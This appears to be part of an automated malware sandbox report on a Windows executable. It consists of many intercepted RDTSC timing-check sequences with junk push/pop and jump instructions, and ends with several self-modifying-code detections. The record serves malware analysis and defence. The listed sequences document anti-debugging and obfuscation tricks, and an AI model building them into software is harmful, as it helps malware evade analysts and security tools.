                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523A3 second address: B523B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F33B8C742F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523B3 second address: B523B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523B8 second address: B523C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F33B8C742F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523C3 second address: B523C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51E08 second address: B51E18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007F33B8C742F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56B8C second address: B56B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEA5 second address: B5FEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEAA second address: B5FEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEAF second address: B5FEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEB5 second address: B5FED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F33B8517E9Eh 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E4F8 second address: B5E4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E4FD second address: B5E50F instructions: 0x00000000 rdtsc 0x00000002 je 00007F33B8517E98h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F33B8517E96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E50F second address: B5E524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74301h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E7F9 second address: B5E80D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33B8517E96h 0x00000008 jo 00007F33B8517E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E80D second address: B5E811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E811 second address: B5E82B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F33B8517EA4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E9EC second address: B5E9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F33B8C742F6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E9FE second address: B5EA36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F33B8517EA9h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F33B8517EA1h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EA36 second address: B5EA3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EB7D second address: B5EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F500 second address: B5F543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FEh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F33B8C742FAh 0x00000011 jmp 00007F33B8C742FCh 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b js 00007F33B8C742FCh 0x00000021 jnp 00007F33B8C742F6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F543 second address: B5F55A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8517EA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F55A second address: B5F55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FD10 second address: B5FD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FD14 second address: B5FD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F33B8C742FDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DB0B second address: B5DB4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA8h 0x00000007 jmp 00007F33B8517E9Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F33B8517EA9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DB4F second address: B5DB6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DB6B second address: B5DB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63E9E second address: B63EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FAh 0x00000009 popad 0x0000000a jnl 00007F33B8C742FAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63EB7 second address: B63EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66B3B second address: B66B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66B3F second address: B66B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B707F3 second address: B707F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B707F7 second address: B707FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B707FB second address: B70801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B70801 second address: B70815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B70815 second address: B7081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7E2DD second address: B7E2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7E2EB second address: B7E2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7E2EF second address: B7E2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B80EAB second address: B80EB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F33B8C7430Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B855B4 second address: B855B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B855B8 second address: B855DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e jne 00007F33B8C742F6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B855DA second address: B85604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F33B8517EA3h 0x0000000b jno 00007F33B8517E96h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jbe 00007F33B8517EA2h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8ED49 second address: B8ED4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8ED4D second address: B8ED69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8ED69 second address: B8ED6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8F5DB second address: B8F5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8F5DF second address: B8F5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8F5E8 second address: B8F611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517E9Ch 0x00000009 jmp 00007F33B8517EA8h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8F611 second address: B8F617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8F617 second address: B8F629 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F33B8517E96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8F629 second address: B8F62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B90083 second address: B9008D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517EACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9008D second address: B900B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74300h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e ja 00007F33B8C742F6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B900B5 second address: B900C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F33B8517E96h 0x0000000a jp 00007F33B8517E96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B91C23 second address: B91C37 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F33B8C742F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F33B8C742F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B94A85 second address: B94AB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F33B8517E9Eh 0x0000000f jmp 00007F33B8517E9Ah 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B94AB4 second address: B94ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B966A9 second address: B966B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F33B8517E9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B966B3 second address: B966BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D525 second address: A9D53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D53F second address: A9D544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D544 second address: A9D569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA8h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D569 second address: A9D573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F33B8C742F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB333E second address: BB335B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB335B second address: BB3361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB3361 second address: BB3366 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB3366 second address: BB3382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F33B8C74301h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB3382 second address: BB338C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA8F58 second address: AA8F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F33B8C742FFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB71B1 second address: BB71FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA0h 0x00000007 jnl 00007F33B8517E9Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F33B8517E9Fh 0x00000015 jmp 00007F33B8517E9Bh 0x0000001a pushad 0x0000001b js 00007F33B8517E96h 0x00000021 jnl 00007F33B8517E96h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB7327 second address: BB732B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB732B second address: BB736D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F33B8517E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F33B8517EA2h 0x00000014 pop edi 0x00000015 push ecx 0x00000016 jng 00007F33B8517E96h 0x0000001c pop ecx 0x0000001d pushad 0x0000001e jmp 00007F33B8517EA5h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC70D3 second address: BC70DD instructions: 0x00000000 rdtsc 0x00000002 js 00007F33B8C742F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC5F60 second address: BC5F70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC5F70 second address: BC5F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6238 second address: BC623C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC67AB second address: BC67D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F33B8C742FEh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jg 00007F33B8C742F6h 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F33B8C742FCh 0x0000001e pop edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6914 second address: BC6929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F33B8517E9Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6AAA second address: BC6AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F33B8C742F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6AB6 second address: BC6AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F33B8517E9Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9B68 second address: BC9B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9B6C second address: BC9B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9FE3 second address: BC9FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C102B3 second address: 4C102B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C102B8 second address: 4C102D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C102D0 second address: 4C102D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C102D4 second address: 4C102E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C102E7 second address: 4C10334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F33B8517EA6h 0x00000016 add ecx, 365CD338h 0x0000001c jmp 00007F33B8517E9Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C10334 second address: 4C10338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C10338 second address: 4C10352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F33B8517E9Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C10352 second address: 4C10358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C10358 second address: 4C10374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ecx, 2A2BBAE3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C103BA second address: 4C103CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8C742FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C103CB second address: 4C10428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f pushfd 0x00000010 jmp 00007F33B8517EA8h 0x00000015 sub si, 7648h 0x0000001a jmp 00007F33B8517E9Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F33B8517EA4h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF84A second address: AEF84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 931A2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: ADB3C9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AD9BBE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9319C3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AF2DE2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B6BEB1 instructions caused by: Self-modifying code
